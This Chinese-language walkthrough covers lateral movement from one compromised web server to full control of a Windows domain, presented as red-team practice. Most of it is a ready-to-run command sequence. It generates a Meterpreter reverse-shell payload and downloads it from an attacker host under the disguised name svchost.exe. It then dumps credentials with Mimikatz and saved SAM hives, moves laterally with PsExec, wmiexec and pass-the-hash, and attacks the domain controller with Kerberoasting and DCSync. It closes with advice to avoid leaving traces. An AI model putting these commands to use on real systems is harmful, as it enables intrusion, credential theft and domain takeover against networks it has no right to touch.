内网横向移动：从单台沦陷到域控拿下

概述#

内网渗透是红蓝对抗中最精彩的环节之一。本文记录从获得一台 Web 服务器权限开始，到最终控制整个域环境的完整过程。

第一阶段：立足点#

上线 C2#

获取 WebShell 后，首先需要建立稳定的命令控制通道。

# 使用 MSF 生成 payload
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=4444 -f exe -o payload.exe

# certutil 下载
certutil -urlcache -split -f http://x.x.x.x/payload.exe C:\Windows\Temp\svchost.exe

# PowerShell 下载
powershell (New-Object Net.WebClient).DownloadFile('http://x.x.x.x/payload.exe','C:\Windows\Temp\svchost.exe')

第二阶段：信息收集#

# 查看当前用户和权限
whoami /all

# 查看网络配置
ipconfig /all

# 查看域信息
net time /domain
net group "Domain Admins" /domain

# 查看端口和进程
netstat -ano
tasklist /svc

第三阶段：凭证提取#

Mimikatz 提取密码#

# 提权到 SYSTEM 后运行
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" exit

# 导出 SAM
reg save HKLM\SAM sam.hive
reg save HKLM\SYSTEM system.hive

横向移动#

# PSExec 横向
PsExec.exe \\192.168.1.10 -u DOMAIN\admin -p password cmd

# WMI 横向
wmiexec.py DOMAIN/admin:password@192.168.1.10

# 哈希传递 (PtH)
crackmapexec smb 192.168.1.0/24 -u admin -H NTLM_HASH

第四阶段：域控攻击#

Kerberoasting#

# 请求 TGS 票据
Rubeus.exe kerberoast /outfile:hashes.txt

# 离线破解
hashcat -m 13100 hashes.txt rockyou.txt

DCSync#

# 使用 DCSync 导出域控哈希
mimikatz.exe "lsadump::dcsync /domain:corp.local /user:Administrator" exit

总结#

内网渗透的关键是信息收集和横向移动。每一步都要留意可能暴露的痕迹，同时善于利用已获得的凭据拓展攻击面。